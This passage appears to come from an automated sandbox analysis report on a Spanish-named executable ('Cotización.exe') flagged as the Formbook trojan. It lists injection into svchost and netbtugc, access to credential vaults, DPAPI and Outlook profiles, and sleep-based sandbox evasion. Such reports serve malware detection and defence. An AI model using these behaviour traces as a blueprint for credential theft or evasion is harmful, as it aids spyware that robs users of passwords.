            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035B5130 appears 50 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0356B970 appears 279 times
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: String function: 00445AE0 appears 65 times
            Source: Cotizaci#U00f3n.exe, 00000000.00000003.1326823393.00000000049CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3n.exe
            Source: Cotizaci#U00f3n.exe, 00000000.00000003.1317143461.0000000004823000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3n.exe
            Source: Cotizaci#U00f3n.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeFile created: C:\Users\user\AppData\Local\Temp\AlleneJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCommand line argument: ou0_2_0040D6B0
            Source: Cotizaci#U00f3n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.1800056146.0000000003080000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3759956328.000000000308B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3759956328.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3759956328.0000000003080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Cotizaci#U00f3n.exeReversingLabs: Detection: 55%
            Source: Cotizaci#U00f3n.exeVirustotal: Detection: 56%
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeFile read: C:\Users\user\Desktop\Cotizaci#U00f3n.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.exe "C:\Users\user\Desktop\Cotizaci#U00f3n.exe"
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Cotizaci#U00f3n.exe"
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Cotizaci#U00f3n.exe"Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Cotizaci#U00f3n.exeStatic file information: File size 1364003 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UOIRaMZSIyDCj.exe, 00000003.00000002.3763456285.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579370563.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Cotizaci#U00f3n.exe, 00000000.00000003.1315794811.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Cotizaci#U00f3n.exe, 00000000.00000003.1326823393.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1416065692.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1414220526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.000000000379E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1505597228.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.0000000003540000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1508797342.0000000003393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Cotizaci#U00f3n.exe, 00000000.00000003.1315794811.0000000004700000.00000004.00001000.00020000.00000000.sdmp, Cotizaci#U00f3n.exe, 00000000.00000003.1326823393.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1505990325.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1416065692.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1414220526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505990325.000000000379E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1505597228.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3764857379.0000000003540000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1508797342.0000000003393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1473841768.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505722622.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000002.3763899139.0000000000F47000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3759956328.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3765472175.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579774617.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001E89C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3759956328.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3765472175.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000000.1579774617.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001E89C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1473841768.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1505722622.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000003.00000002.3763899139.0000000000F47000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: Cotizaci#U00f3n.exeStatic PE information: real checksum: 0xa961f should be: 0x155079
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBEBF6 push ds; retf 3_2_02DBEC0E
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBFBB2 push edi; retf 3_2_02DBFBD5
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC3319 push 789F05E2h; iretd 3_2_02DC3320
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBE8C1 push esi; ret 3_2_02DBE8C6
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DB882F pushad ; ret 3_2_02DB8830
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBC98D push edi; retf 3_2_02DBC990
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC2EB9 push C5503231h; retf 3_2_02DC2EC1
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC175A push 00000030h; retf 3_2_02DC1767
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeAPI/Special instruction interceptor: Address: 406CE34
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3619Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6354Jump to behavior
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87621
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 572Thread sleep count: 3619 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 572Thread sleep time: -7238000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 572Thread sleep count: 6354 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 572Thread sleep time: -12708000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe TID: 64Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe TID: 64Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe TID: 64Thread sleep time: -49500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe TID: 64Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe TID: 64Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
